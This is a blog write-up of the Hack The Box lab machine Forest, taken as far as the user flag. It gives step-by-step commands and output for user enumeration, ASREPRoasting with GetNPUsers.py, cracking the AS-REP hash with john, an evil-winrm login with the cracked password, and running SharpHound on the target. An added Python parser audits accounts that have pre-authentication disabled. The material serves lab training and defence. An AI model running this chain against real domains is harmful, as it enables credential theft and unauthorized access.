ペンギン技術 blog (Penguin Tech blog)

I plan to post CTF writeups and similar material here.

Hack The Box Writeup: Forest (partial, up to obtaining user.txt)

■Preparation: log in to the HTB site and download the .ovpn file from there beforehand

Connect over the VPN

$ sudo openvpn lab_xxxxx1.ovpn
(omitted)
2021-07-16 21:36:53 net_route_v4_add: 10.10.10.0/23 via 10.10.16.1 dev [NULL] table 0 metric -1
(omitted)
2021-07-16 22:01:20 Preserving previous TUN/TAP instance: tun0
2021-07-16 22:01:20 Initialization Sequence Completed

Once it stops at "Initialization Sequence Completed", the tunnel is up.
Open a separate terminal and run the following commands from there.


■The box
Forest
https://app.hackthebox.eu/machines/Forest

Reference
https://qiita.com/v_avenger/items/43014e5e34fe491764c8

■Information gathering (network)

$ nmap -sV -sT -sC 10.10.10.161
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-17 03:29 EDT
Nmap scan report for 10.10.10.161
Host is up (0.55s latency).
Not shown: 989 closed ports
PORT     STATE SERVICE      VERSION
53/tcp   open  domain       Simple DNS Plus
88/tcp   open  kerberos-sec Microsoft Windows Kerberos (server time: 2021-07-17 07:49:25Z)
135/tcp  open  msrpc        Microsoft Windows RPC
139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn
389/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: HTB)
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
Service Info: Host: FOREST; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 2h39m08s, deviation: 4h02m32s, median: 19m06s
| smb-os-discovery:
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
|   Computer name: FOREST
|   NetBIOS computer name: FOREST\x00
|   Domain name: htb.local
|   Forest name: htb.local
|   FQDN: FOREST.htb.local
|_  System time: 2021-07-17T00:49:50-07:00
| smb-security-mode:
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required
| smb2-security-mode:
|   2.02:
|_    Message signing enabled and required
| smb2-time:
|   date: 2021-07-17T07:49:48
|_  start_date: 2021-07-16T05:25:15

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 124.64 seconds

■Information gathering (users)

$ enum4linux   10.10.10.161
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sat Jul 17 03:33:01 2021
(omitted)
 =============================
|    Users on 10.10.10.161    |
 =============================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 866.
index: 0x2137 RID: 0x463 acb: 0x00020015 Account: $331000-VK4ADACQNUCA  Name: (null)    Desc: (null)
index: 0xfbc RID: 0x1f4 acb: 0x00020010 Account: Administrator  Name: Administrator     Desc: Built-in account for administering the computer/domain
index: 0x2369 RID: 0x47e acb: 0x00000210 Account: andy  Name: Andy Hislip       Desc: (null)
index: 0xfbe RID: 0x1f7 acb: 0x00000215 Account: DefaultAccount Name: (null)    Desc: A user account managed by the system.
index: 0xfbd RID: 0x1f5 acb: 0x00000215 Account: Guest  Name: (null)    Desc: Built-in account for guest access to the computer/domain
index: 0x2352 RID: 0x478 acb: 0x00000210 Account: HealthMailbox0659cc1  Name: HealthMailbox-EXCH01-010  Desc: (null)
index: 0x234b RID: 0x471 acb: 0x00000210 Account: HealthMailbox670628e  Name: HealthMailbox-EXCH01-003  Desc: (null)
index: 0x234d RID: 0x473 acb: 0x00000210 Account: HealthMailbox6ded678  Name: HealthMailbox-EXCH01-005  Desc: (null)
index: 0x2351 RID: 0x477 acb: 0x00000210 Account: HealthMailbox7108a4e  Name: HealthMailbox-EXCH01-009  Desc: (null)
index: 0x234e RID: 0x474 acb: 0x00000210 Account: HealthMailbox83d6781  Name: HealthMailbox-EXCH01-006  Desc: (null)
index: 0x234c RID: 0x472 acb: 0x00000210 Account: HealthMailbox968e74d  Name: HealthMailbox-EXCH01-004  Desc: (null)
index: 0x2350 RID: 0x476 acb: 0x00000210 Account: HealthMailboxb01ac64  Name: HealthMailbox-EXCH01-008  Desc: (null)
index: 0x234a RID: 0x470 acb: 0x00000210 Account: HealthMailboxc0a90c9  Name: HealthMailbox-EXCH01-002  Desc: (null)
index: 0x2348 RID: 0x46e acb: 0x00000210 Account: HealthMailboxc3d7722  Name: HealthMailbox-EXCH01-Mailbox-Database-1118319013        Desc: (null)
index: 0x2349 RID: 0x46f acb: 0x00000210 Account: HealthMailboxfc9daad  Name: HealthMailbox-EXCH01-001  Desc: (null)
index: 0x234f RID: 0x475 acb: 0x00000210 Account: HealthMailboxfd87238  Name: HealthMailbox-EXCH01-007  Desc: (null)
index: 0xff4 RID: 0x1f6 acb: 0x00020011 Account: krbtgt Name: (null)    Desc: Key Distribution Center Service Account
index: 0x2360 RID: 0x47a acb: 0x00000210 Account: lucinda       Name: Lucinda Berger    Desc: (null)
index: 0x236a RID: 0x47f acb: 0x00000210 Account: mark  Name: Mark Brandt       Desc: (null)
index: 0x236b RID: 0x480 acb: 0x00000210 Account: santi Name: Santi Rodriguez   Desc: (null)
index: 0x235c RID: 0x479 acb: 0x00000210 Account: sebastien     Name: Sebastien Caron   Desc: (null)
index: 0x215a RID: 0x468 acb: 0x00020011 Account: SM_1b41c9286325456bb  Name: Microsoft Exchange Migration      Desc: (null)
index: 0x2161 RID: 0x46c acb: 0x00020011 Account: SM_1ffab36a2f5f479cb  Name: SystemMailbox{8cc370d3-822a-4ab8-a926-bb94bd0641a9}     Desc: (null)
index: 0x2156 RID: 0x464 acb: 0x00020011 Account: SM_2c8eef0a09b545acb  Name: Microsoft Exchange Approval Assistant   Desc: (null)
index: 0x2159 RID: 0x467 acb: 0x00020011 Account: SM_681f53d4942840e18  Name: Discovery Search Mailbox  Desc: (null)
index: 0x2158 RID: 0x466 acb: 0x00020011 Account: SM_75a538d3025e4db9a  Name: Microsoft Exchange        Desc: (null)
index: 0x215c RID: 0x46a acb: 0x00020011 Account: SM_7c96b981967141ebb  Name: E4E Encryption Store - Active     Desc: (null)
index: 0x215b RID: 0x469 acb: 0x00020011 Account: SM_9b69f1b9d2cc45549  Name: Microsoft Exchange Federation Mailbox   Desc: (null)
index: 0x215d RID: 0x46b acb: 0x00020011 Account: SM_c75ee099d0a64c91b  Name: Microsoft Exchange        Desc: (null)
index: 0x2157 RID: 0x465 acb: 0x00020011 Account: SM_ca8c2ed5bdab4dc9b  Name: Microsoft Exchange        Desc: (null)
index: 0x2365 RID: 0x47b acb: 0x00010210 Account: svc-alfresco  Name: svc-alfresco      Desc: (null)

Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 881.
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[DefaultAccount] rid:[0x1f7]
user:[$331000-VK4ADACQNUCA] rid:[0x463]
user:[SM_2c8eef0a09b545acb] rid:[0x464]
user:[SM_ca8c2ed5bdab4dc9b] rid:[0x465]
user:[SM_75a538d3025e4db9a] rid:[0x466]
user:[SM_681f53d4942840e18] rid:[0x467]
user:[SM_1b41c9286325456bb] rid:[0x468]
user:[SM_9b69f1b9d2cc45549] rid:[0x469]
user:[SM_7c96b981967141ebb] rid:[0x46a]
user:[SM_c75ee099d0a64c91b] rid:[0x46b]
user:[SM_1ffab36a2f5f479cb] rid:[0x46c]
user:[HealthMailboxc3d7722] rid:[0x46e]
user:[HealthMailboxfc9daad] rid:[0x46f]
user:[HealthMailboxc0a90c9] rid:[0x470]
user:[HealthMailbox670628e] rid:[0x471]
user:[HealthMailbox968e74d] rid:[0x472]
user:[HealthMailbox6ded678] rid:[0x473]
user:[HealthMailbox83d6781] rid:[0x474]
user:[HealthMailboxfd87238] rid:[0x475]
user:[HealthMailboxb01ac64] rid:[0x476]
user:[HealthMailbox7108a4e] rid:[0x477]
user:[HealthMailbox0659cc1] rid:[0x478]
user:[sebastien] rid:[0x479]
user:[lucinda] rid:[0x47a]
user:[svc-alfresco] rid:[0x47b]
user:[andy] rid:[0x47e]
user:[mark] rid:[0x47f]
user:[santi] rid:[0x480]

 =========================================
(omitted)

An ASREPRoast attack appears to be applicable here.

https://book.hacktricks.xyz/windows/active-directory-methodology/asreproast

ASREPRoast looks for users for whom Kerberos pre-authentication is not required (the DONT_REQ_PREAUTH attribute). For such users, anyone can send an AS_REQ to the DC on their behalf and receive an AS_REP message in return.
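The enum4linux listing above already exposes this setting: its acb column is the MS-SAMR account-control bitmask, in which 0x10000 is DONT_REQUIRE_PREAUTH (svc-alfresco's 0x00010210 has it set; the other accounts do not). The following is an added example, not code from the original post nor from enum4linux or impacket: a small Python parser that decodes the acb column so an AD administrator can audit which enabled accounts have pre-authentication disabled. Flag names follow the Samba/MS-SAMR ACB naming, and the sample lines are copied from the output above.

```python
import re

# MS-SAMR account-control (ACB) bits, as shown in enum4linux's "acb:" column.
ACB_FLAGS = {
    0x00001: "DISABLED",
    0x00004: "PWNOTREQ",
    0x00010: "NORMAL",
    0x00200: "PWNOEXP",
    0x10000: "DONT_REQUIRE_PREAUTH",   # the bit ASREPRoast relies on
    0x20000: "PW_EXPIRED",
}

USER_LINE = re.compile(
    r"^index:\s+\S+\s+RID:\s+(?P<rid>0x[0-9a-f]+)\s+acb:\s+(?P<acb>0x[0-9a-f]+)"
    r"\s+Account:\s+(?P<account>\S+)", re.IGNORECASE)

def parse_users(text):
    """Return (account, rid, acb) for every 'index:' line in enum4linux output."""
    users = []
    for line in text.splitlines():
        m = USER_LINE.match(line.strip())
        if m:
            users.append((m["account"], int(m["rid"], 16), int(m["acb"], 16)))
    return users

def decode_acb(acb):
    """Names of the known ACB bits set in acb; any unknown bits are kept as hex."""
    names = [name for bit, name in ACB_FLAGS.items() if acb & bit]
    unknown = acb & ~sum(ACB_FLAGS)
    return names + ([hex(unknown)] if unknown else [])

def no_preauth_accounts(text):
    """Enabled accounts with DONT_REQUIRE_PREAUTH set: the ones an admin should review."""
    return [acct for acct, _rid, acb in parse_users(text)
            if acb & 0x10000 and not acb & 0x00001]

# Constructed excerpt: four lines copied from the enum4linux output above.
SAMPLE = """\
index: 0xfbc RID: 0x1f4 acb: 0x00020010 Account: Administrator  Name: Administrator     Desc: Built-in account
index: 0xfbd RID: 0x1f5 acb: 0x00000215 Account: Guest  Name: (null)    Desc: Built-in account for guest access
index: 0x2369 RID: 0x47e acb: 0x00000210 Account: andy  Name: Andy Hislip       Desc: (null)
index: 0x2365 RID: 0x47b acb: 0x00010210 Account: svc-alfresco  Name: svc-alfresco      Desc: (null)
"""

if __name__ == "__main__":
    for acct, rid, acb in parse_users(SAMPLE):
        print(f"{acct:14} rid={rid:#x} acb={acb:#010x} {decode_acb(acb)}")
    print("pre-auth not required:", no_preauth_accounts(SAMPLE))  # ['svc-alfresco']
```

Clearing that bit on the flagged account (or giving it a long random password) removes the offline-cracking exposure shown later in this writeup.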

Download the tool used for ASREPRoast (GetNPUsers.py)
$ wget https://raw.githubusercontent.com/SecureAuthCorp/impacket/master/examples/GetNPUsers.py

Tried running it, but it fails because the impacket module is apparently missing
$ python3 GetNPUsers.py --help
ModuleNotFoundError: No module named 'impacket.examples.utils'

$ pip --version
pip 20.3.4 from /usr/lib/python3/dist-packages/pip (python 3.9)

impacket seems to be installed, so try uninstalling it first
→ Apparently there is nothing to remove. Is this environment even sane?
$ pip uninstall impacket
Found existing installation: impacket 0.9.22
Not uninstalling impacket at /usr/lib/python3/dist-packages, outside environment /usr
Can't uninstall 'impacket'. No files were found to uninstall.

Download the required module (impacket)
git clone https://github.com/CoreSecurity/impacket.git

cd impacket

vi setup.py
Change the shebang from "#!/usr/bin/env python" to "#!/usr/bin/env python3"

Install impacket
$ sudo python3 setup.py install

$ python3 GetNPUsers.py --help
Impacket v0.9.24.dev1+20210720.100427.cd4fe47c - Copyright 2021 SecureAuth Corporation

usage: GetNPUsers.py [-h] [-request] [-outputfile OUTPUTFILE] [-format {hashcat,john}] [-usersfile USERSFILE] [-ts] [-debug] [-hashes LMHASH:NTHASH] [-no-pass] [-k] [-aesKey hex key] [-dc-ip ip address] target

A list of usernames is needed, so save the "Users on 10.10.10.161" section of the enum4linux output
$ cat users_forest.txt
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
...

Extract the usernames using [ and ] as delimiters
$ cat users_forest.txt | cut -d "[" -f 2 | cut -d "]" -f 1 > usernames_forest.txt

$ cat usernames_forest.txt
Administrator
Guest
...

HTB.local/    the domain name (from "Domain name: htb.local")
-usersfile    the list of usernames
-format       output in a format john can crack
-outputfile   file to write the results to (any name works)

$ python3 GetNPUsers.py HTB.local/ -usersfile usernames_forest.txt -format john -outputfile output_forest.txt -no-pass -dc-ip 10.10.10.161
Impacket v0.9.24.dev1+20210720.100427.cd4fe47c - Copyright 2021 SecureAuth Corporation

[-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
(omitted)
[-] User HealthMailbox7108a4e doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User HealthMailbox0659cc1 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User sebastien doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User lucinda doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User andy doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User mark doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User santi doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] invalid principal syntax

It looked like a failure, but output_forest.txt does contain output

$ cat output_forest.txt
$krb5asrep$svc-alfresco@HTB.LOCAL:d93839684eb654739ffa7(truncated)

So we obtained the AS-REP hash for the user "svc-alfresco"

Crack the hash with john (wordlist: rockyou.txt)

$ john output_forest.txt --wordlist=rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 512/512 AVX512BW 16x])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
s3rvice          ($krb5asrep$svc-alfresco@HTB.LOCAL)
1g 0:00:00:03 DONE (2021-07-26 16:33) 0.2770g/s 1131Kp/s 1131Kc/s 1131KC/s s521379846..s3r2s1
Use the "--show" option to display all of the cracked passwords reliably
Session completed

The recovered password is "s3rvice"

Now that we have credentials, check whether we can connect over WinRM

$ nmap -p 5985 10.10.10.161
PORT     STATE SERVICE
5985/tcp open  wsman

Nmap done: 1 IP address (1 host up) scanned in 0.89 seconds

The port is open
WS-Management (WSMan) is, roughly speaking, WinRM

https://yanor.net/wiki/?PowerShell/%E3%83%AA%E3%83%A2%E3%83%BC%E3%83%88%E6%8E%A5%E7%B6%9A/%E3%83%AA%E3%83%A2%E3%83%BC%E3%83%88%E6%8E%A5%E7%B6%9A%E3%81%AE%E3%81%9F%E3%82%81%E3%81%AE%E3%82%B5%E3%83%BC%E3%83%93%E3%82%B9%E3%81%A8%E3%83%97%E3%83%AD%E3%83%88%E3%82%B3%E3%83%AB+WinRM%E3%81%A8WS-MAN (WinRM and WS-MAN)


| Client PC
|   ↓ WS-MAN (HTTP)
| Remote PC
|   ↓
|   WinRM
|   ↓
|   PowerShell

Install the tools used for the connection
$ sudo gem install winrm winrm-fs colorize stringio

$ git clone https://github.com/Hackplayers/evil-winrm.git
$ cd evil-winrm

Connect over WinRM

$ ./evil-winrm.rb -i 10.10.10.161 -u svc-alfresco -p s3rvice
Evil-WinRM shell v3.0
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents>

Display the flag

*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> type C:\Users\svc-alfresco\Desktop\user.txt
e5e*********************************ed

That is the first flag.


Next, analyze the Windows Active Directory environment with a tool called BloodHound
It maps the relationships within the AD environment and gives clues for working toward Domain Admins

Download it locally
$ cd evil-winrm
$ wget https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Collectors/SharpHound.ps1

Upload it to the target machine and run it

*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> upload SharpHound.ps1
Info: Upload successful!

*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> Import-module ./SharpHound.ps1

*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> Invoke-BloodHound -CollectionMethod ACL,ObjectProps,Default -NoSaveCache
※ -CompressData and -RemoveCSV produced errors, so those options were dropped

*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> dir

    Directory: C:\Users\svc-alfresco\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        7/26/2021   1:44 AM          15361 20210726014448_BloodHound.zip ★ result file
-a----        7/26/2021   1:41 AM         974235 SharpHound.ps1
-ar---        9/23/2019   2:16 PM             32 user.txt

Download the result file

*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> download 20210726014448_BloodHound.zip
Info: Download successful!

It says "Download successful!", yet for some reason the file does not show up locally...
Is this a bug in the tool?
Stopping here for now.